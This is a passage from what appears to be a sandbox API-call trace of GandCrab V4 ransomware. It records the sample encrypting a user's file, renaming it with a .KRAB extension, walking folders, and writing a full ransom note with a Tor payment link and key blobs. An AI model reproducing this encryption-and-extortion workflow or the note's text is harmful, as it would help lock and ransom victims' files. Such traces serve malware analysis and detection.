(hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.290] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0091.291] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0091.291] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.291] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0091.291] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0091.291] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.291] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.293] GetLastError () returned 0x0 [0091.293] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0091.293] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0091.293] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010e80) returned 1 [0091.293] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd2a0) returned 1 [0091.293] CryptGetKeyParam (in: hKey=0xfbd2a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.293] CryptEncrypt (in: hKey=0xfbd2a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.294] GetLastError () returned 0x0 [0091.294] CryptDestroyKey (hKey=0xfbd2a0) returned 1 [0091.294] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0091.294] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\lt4y5g.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.294] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.295] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.295] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xdff5, lpOverlapped=0x0) returned 1 [0091.315] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff200b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.315] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xdff5, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xdff5, lpOverlapped=0x0) returned 1 [0091.315] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0091.316] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.321] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.321] CloseHandle (hObject=0x434) returned 1 [0091.321] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.322] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\lt4y5g.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\lt4y5G.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\lt4y5g.pptx.krab")) returned 1 [0091.323] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.323] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.323] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0091.323] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0091.323] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music" [0091.323] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\" [0091.323] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0091.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.324] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.324] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.325] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\\\KRAB-DECRYPT.txt") returned 58 [0091.325] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my music\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.325] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0091.325] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0091.326] CloseHandle (hObject=0x434) returned 1 [0091.326] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.327] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.327] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x26, wMilliseconds=0x20e)) [0091.327] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.327] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.327] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.328] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\d2ca4a08d2ca4dee3d.lock") returned 64 [0091.328] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my music\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0091.328] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.328] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.329] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\") returned 41 [0091.329] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*" [0091.329] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0091.329] CloseHandle (hObject=0x434) returned 1 [0091.329] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.329] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0091.329] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0091.329] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures" [0091.329] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\" [0091.329] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0091.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.330] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.330] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.330] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\\\KRAB-DECRYPT.txt") returned 61 [0091.330] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my pictures\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.331] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0091.331] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0091.333] CloseHandle (hObject=0x434) returned 1 [0091.333] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.334] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.334] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x26, wMilliseconds=0x20e)) [0091.334] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.334] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.335] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.336] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\d2ca4a08d2ca4dee3d.lock") returned 67 [0091.336] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my pictures\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0091.337] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.337] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\") returned 44 [0091.338] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*" [0091.338] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0091.338] CloseHandle (hObject=0x434) returned 1 [0091.338] FindNextFileW (in: 